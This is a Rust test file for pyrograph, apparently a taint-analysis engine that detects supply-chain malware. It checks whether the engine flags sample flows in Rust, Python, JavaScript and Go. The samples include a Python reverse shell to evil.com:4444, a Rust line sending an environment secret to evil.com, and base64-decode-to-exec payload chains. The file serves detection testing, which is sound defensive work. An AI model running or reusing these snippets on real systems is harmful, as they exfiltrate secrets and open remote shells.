pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
Documentation
//! BREAK-IT tests: designed to expose real bugs across ALL pyrograph parsers.
//! A failing test here means the taint-analysis engine missed a flow or
//! produced a false positive — it is a finding, NOT a bug in the test.

use pyrograph::analyze;

// ---------------------------------------------------------------------------
// RUST
// ---------------------------------------------------------------------------

/// 1. Taint must propagate through format! macro arguments.
/// If the engine treats format! as an opaque sink instead of propagating
/// taint from its arguments to its result, this test FAILS.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_format_macro_propagates_taint() {
    let source = r#"
        fn main() {
            let secret = std::env::var("SECRET").unwrap();
            let url = format!("http://evil.com/{}", secret);
            reqwest::get(url);
        }
    "#;
    let graph = pyrograph::parse::parse_rust(source, "main.rs").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: taint did not propagate through format! macro args"
    );
}

/// 2. Multi-hop variable reassignment chain.
/// If the engine loses taint after more than one assignment, this test FAILS.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_multi_hop_variable_chain() {
    let source = r#"
        fn main() {
            let x = std::env::var("T").unwrap();
            let y = x;
            let z = y;
            let _ = reqwest::get(&z);
        }
    "#;
    let graph = pyrograph::parse::parse_rust(source, "main.rs").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: taint lost across multi-hop variable chain"
    );
}

/// 7-RUST. Benign code that MUST NOT be flagged.
#[cfg(feature = "rust-lang")]
#[test]
fn rust_benign_no_false_positive() {
    let source = r#"
        fn main() {
            let port = std::env::var("PORT").unwrap().parse::<u16>().unwrap();
            println!("Listening on {}", port);
            let safe = "https://example.com";
            reqwest::get(safe);
        }
    "#;
    let graph = pyrograph::parse::parse_rust(source, "main.rs").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        findings.is_empty(),
        "ENGINE BUG: false positive on benign Rust code"
    );
}

// ---------------------------------------------------------------------------
// PYTHON
// ---------------------------------------------------------------------------

/// 3. Three-step chain: os.environ -> base64.b64decode -> exec.
/// If the engine does not track taint through base64.b64decode returns,
/// this test FAILS.
#[cfg(feature = "python")]
#[test]
fn python_three_step_chain_exec_b64decode() {
    let source = r#"
import os
import base64
payload = base64.b64decode(os.environ['P'])
exec(payload)
"#;
    let graph = pyrograph::parse::parse_python(source, "malware.py").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: missed 3-step chain os.environ -> b64decode -> exec"
    );
}

/// 4. Reverse shell via subprocess.Popen with socket.socket as stdin.
/// socket.socket() is a network source; stdin to /bin/sh is a command sink.
#[cfg(feature = "python")]
#[test]
fn python_reverse_shell_popen_socket_stdin() {
    let source = r#"
import subprocess
import socket
s = socket.socket()
s.connect(("evil.com", 4444))
subprocess.Popen(["/bin/sh"], stdin=s)
"#;
    let graph = pyrograph::parse::parse_python(source, "revshell.py").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: missed reverse shell subprocess.Popen(stdin=socket)"
    );
}

/// 7-PYTHON. Benign code that MUST NOT be flagged.
#[cfg(feature = "python")]
#[test]
fn python_benign_no_false_positive() {
    let source = r#"
import os
port = int(os.environ.get("PORT", "8080"))
print(f"Server starting on port {port}")
"#;
    let graph = pyrograph::parse::parse_python(source, "clean.py").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        findings.is_empty(),
        "ENGINE BUG: false positive on benign Python code"
    );
}

// ---------------------------------------------------------------------------
// JAVASCRIPT
// ---------------------------------------------------------------------------

/// 5. Chained eval: process.env -> Buffer.from -> .toString -> eval.
/// If the engine does not propagate taint through Buffer.from(...).toString(),
/// this test FAILS.
#[cfg(feature = "js")]
#[test]
fn js_chained_eval_buffer_from_base64() {
    let source = r#"
        var payload = Buffer.from(process.env.P, 'base64').toString();
        eval(payload);
    "#;
    let graph = pyrograph::parse::parse_js(source, "malware.js").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: missed chain process.env -> Buffer.from -> toString -> eval"
    );
}

/// 7-JS. Benign code that MUST NOT be flagged.
#[cfg(feature = "js")]
#[test]
fn js_benign_no_false_positive() {
    let source = r#"
        const port = process.env.PORT || 3000;
        console.log('Starting server on port', port);
        const config = { host: 'localhost' };
        console.log(config);
    "#;
    let graph = pyrograph::parse::parse_js(source, "clean.js").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        findings.is_empty(),
        "ENGINE BUG: false positive on benign JS code"
    );
}

// ---------------------------------------------------------------------------
// GO
// ---------------------------------------------------------------------------

/// 6. Direct flow: os.Getenv -> exec.Command -> Run.
#[cfg(feature = "go")]
#[test]
fn go_direct_exec_command_env() {
    let source = r#"
        package main
        import "os"
        import "os/exec"
        func init() {
            cmd := os.Getenv("C")
            exec.Command(cmd).Run()
        }
    "#;
    let graph = pyrograph::parse::parse_go(source, "main.go").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        !findings.is_empty(),
        "ENGINE BUG: missed direct flow os.Getenv -> exec.Command.Run"
    );
}

/// 7-GO. Benign code that MUST NOT be flagged.
#[cfg(feature = "go")]
#[test]
fn go_benign_no_false_positive() {
    let source = r#"
        package main
        import "os"
        import "fmt"
        func main() {
            port := os.Getenv("PORT")
            fmt.Println("Port:", port)
        }
    "#;
    let graph = pyrograph::parse::parse_go(source, "clean.go").unwrap();
    let findings = analyze(&graph).unwrap();
    assert!(
        findings.is_empty(),
        "ENGINE BUG: false positive on benign Go code"
    );
}